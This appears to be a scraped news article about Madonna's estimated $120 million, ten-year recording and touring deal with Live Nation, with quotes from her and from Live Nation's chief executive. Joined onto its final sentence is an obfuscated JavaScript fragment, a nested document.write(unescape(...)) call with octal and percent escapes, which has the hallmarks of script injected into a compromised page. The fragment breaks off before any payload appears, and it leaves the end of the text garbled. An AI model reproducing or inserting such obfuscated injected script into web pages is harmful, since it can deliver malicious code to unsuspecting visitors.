Madonna has signed a ground-breaking deal to give her fans "unlimited" access to her music it has been confirmed.
The 'Material Girl' singer agreed a recording and touring contract with concert promoter Live Nation, because she believed the deal - worth an estimated $120 million over 10 years - would offer "endless" possibilities.
Madonna said: "The paradigm in the music business has shifted and as an artist and a businesswoman, I have to move with that shift.
"For the first time in my career, the way that my music can reach my fans is unlimited. I've never wanted to think in a limited way and with this new partnership, the possibilities are endless."
Live Nation own the rights to all her music-related projects - including new albums, tours, merchandise, websites, DVDs, sponsorship, TV shows and films.
Live Nation chief executive Michael Rapino said: "Madonna is a true icon and maverick as an artist and in business. Our partnership is a defining moment in music history.
"We have created a new business model for our industry."
Madonna is contracted to make one more album with her long-term record label Warner Music Group Corporation.
The queen of pop was with Warner for 25 years, selling more than 200 million single and albums.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22